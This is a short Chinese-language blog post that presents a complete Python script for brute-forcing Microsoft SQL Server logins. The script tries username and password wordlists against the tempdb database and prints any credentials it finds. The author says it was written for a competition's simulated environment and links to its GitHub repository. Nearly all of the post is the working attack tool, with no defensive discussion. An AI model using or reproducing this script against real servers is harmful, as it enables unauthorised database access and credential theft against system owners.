Sql Server数据库利用字典破译密码
最近在参与一个比赛,模拟了实验环境的攻击脚本。就是让遍历字典,去破译mssql数据库的密码,当时想了许久。其实思路很简单,就是利用简单的数据库的连接就能判断密码是否正确。对于mssql而言,每个用户始终都存在这个tempdb,到时候连接的时候直接连接这个库就行。利用python实现了一下。
#!/usr/bin/env python #coding=utf-8 #----------------------------------------------- #Author: CRoot #descript:mssql psaaword burte import pymssql import argparse from colorama import Fore,Style def chekpassword(ms_server,ms_user,ms_password): #connect mssql to check password try: conn = pymssql.connect(ms_server,ms_user.strip('\n'),ms_password.strip('\n'),'tempdb',charset='UTF-8') cur = conn.cursor() if not cur: return 0 else: return 1 except Exception as Error: return 0 return 1 def DictAttck(Host,UsernameFile,PasswordFile): UserHandle = open(UsernameFile) for user in UserHandle: PwdHandle = open(PasswordFile) for pwd in PwdHandle: print Fore.RED + "[***] " + Style.RESET_ALL + "Try to UserName:%s Password:%s"%(user,pwd) if chekpassword(Host,user,pwd) == 1: print Fore.GREEN + "[OK] " + Style.RESET_ALL + "Got password. Username:%s Password:%s" %(user,pwd) break def FixUserAttack(Host,Username,PasswordFile): PwdHandle = open(PasswordFile) for line in PwdHandle: print Fore.RED + "[***] " + Style.RESET_ALL + "Try to UserName:%s Password:%s"%(Username,line) if chekpassword(Host,Username,line) == 1: print Fore.GREEN + "[OK] " + Style.RESET_ALL + "Got password. Username:%s Password:%s" %(Username,line) break def main(): parser = argparse.ArgumentParser(description='Attack mssql server password by CRoot') parser.add_argument('-s',metavar='HostAddr',help='Set host address') parser.add_argument('-l',metavar='Username',help='FixUser to attack') parser.add_argument('-L',metavar='Username File',help='Use username dictionary to attach') parser.add_argument('-P',metavar='Password File',help='Use password dictionary to attach') option = parser.parse_args() if option.s == None: parser.print_help() exit(0) if option.l != None and option.P != None: FixUserAttack(option.s,option.l,option.P) elif option.L != None and option.P != None: DictAttck(option.s,option.L,option.P) else: parser.print_help() if __name__ == '__main__': main()
具体可以看https://github.com/BackTrackCRoot/mssql_crack_password/blob/master/mssql_brute_force.py
页面下部广告